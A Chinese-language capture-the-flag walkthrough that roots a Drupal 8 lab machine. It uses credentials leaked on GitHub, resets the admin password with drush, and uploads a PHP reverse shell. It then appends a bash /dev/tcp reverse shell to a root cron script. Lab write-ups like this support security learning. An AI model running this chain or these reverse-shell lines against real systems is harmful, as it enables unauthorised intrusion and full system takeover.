此次的訓練以 Drupal 爲主題,並且思考方式不再是單純的在盒子裏,而是要跳出去…
掃描整獲取目標 IP :nmap -sn 192.168.67.0/24
掃描目標獲取相應信息:nmap -A -p- 192.168.67.242 --> 22 | 80
22 SSH 服務 || 80 HTTP 服務,猜測後面極有可能要用到 SSH 服務…查閱 http://192.168.67.242,CMS 是 Drupal,版本爲 8,沒有找到關於該版本的相關漏洞利用
初步瀏覽頁面,說是引入了新的概念,需要到盒子外邊去尋找線索,盒子外邊?意思是不在這個站,要到別處去?要到哪裏去呢?細心觀察你會發現在初始界面的左下方有這麼一個東西:
再次引出,思考盒子外邊?遇事不決問谷歌,其次問github,百度和必應,既然谷歌大哥不在家,那就問問github,在github找到了一些小東西:
點進去看看,哇,config 配置文件香香的,迫不及待查看一下:
得到用戶名和密碼:
$username = "dc7user";
$password = "MdR3xOgB7#dW";
嘗試用 ssh 登陸,登陸成功
ssh [email protected]
MdR3xOgB7#dW
ls
cd backups
ls
cd ..
cat mbox
發現 Email 版本是 4.89,看下該版本有無可疑提權的
searchsploit Exim local
發現有一個,傳過去(方法有很多)
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /root/
scp 46996.sh [email protected]:/tmp/k.sh
cd /tmp
bash k.sh
但是報錯,好吧,看看mbox還有沒有沒發現的東西:
從上到下,可以看到時間爲 17:00 || 17:15 || 17:30 …
可以看出是隔 15 分鐘就會執行一個文件[定時任務],而且,是以 root 身份權限執行~,那麼路子肯定也就在這裏了。去查看一下改執行文件
cat /opt/scripts/backups.sh
看着名字也大概瞭解是一個備份,看下該文件的權限:
可以看到屬主和屬組的權限是 7 而其他沒有寫權限,那就要想辦法以屬主或屬組身份進入系統,但是不知道密碼,想着能不能通過數據庫修改一下網頁密碼,然後在Drupal 系統後臺上傳一個有漏洞的插件?或者可以直接利用的插件?這就拿到了屬組身份
cat /var/www/html/sites/default/settings.php
mysql -u db7user -p登陸數據庫
show tables;
use d7db;
show tables;
select * from users;
但是,但是,我沒有看到密碼字段???又把其它關於 users 的表查了個遍…木有
好吧,看看還有沒有其它方法…此路不通走彼路
Drupal 是不是有一些特性是不知道的,一般來說做開發,爲了提升效率,可以直接命令行來管理,Drupal有這種東西嗎?
還真有,叫做 drush,查看幫助,這裏需要注意的一個地方就是,需要到該站的主目錄即:/var/www/html/ 下才可以執行drush
cd /var/www/html/
drush -h --> 說是輸入 drush 查看全部命令,這裏還需要說明一下,輸錯 5 次密碼會被暫時封 IP
drush user-password admin --password="123"
登陸一下後臺:admin 123,上傳一個插件,下載地址在這裏:
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
點擊 Extend --> Install new module – > Browser 選擇文件 --> install 上傳即可
將其打開後上傳一個 php 反彈shell,
kali:cp /usr/share/webshells/php/php-reverse-shell.php /root/
kali:nc -vnlp 2333
修改反彈 shell 中的內容:
複製到content:
點擊 save :[注意 Text format 要選擇 “PHP code”],即可獲取反彈 shell
id --> www-data
python -c 'import pty;pty.spawn("/bin/bash")'
寫入反彈 shell 等待 15 分鐘,獲取 root 權限
echo "bash -i >& /dev/tcp/192.168.67.221/6789 0>&1" >> /opt/scripts/backups.sh
kali這邊需要偵聽 6789 端口:
nc -vnlp 6789
id
cd /root
ls
cat theflag.txt
總結:
1.盒子外思考2.對常見的CMS要深入瞭解3.數據庫改密4.善用搜索引擎5.軟件版本漏洞利用6.細心觀察[mbox]7.插件利用8.上傳shell9.簡單的 shell 編寫 [bash -i >& /dev/tcp/192.168.67.221/6789 0>&1]10.linux 權限11.linux 定時任務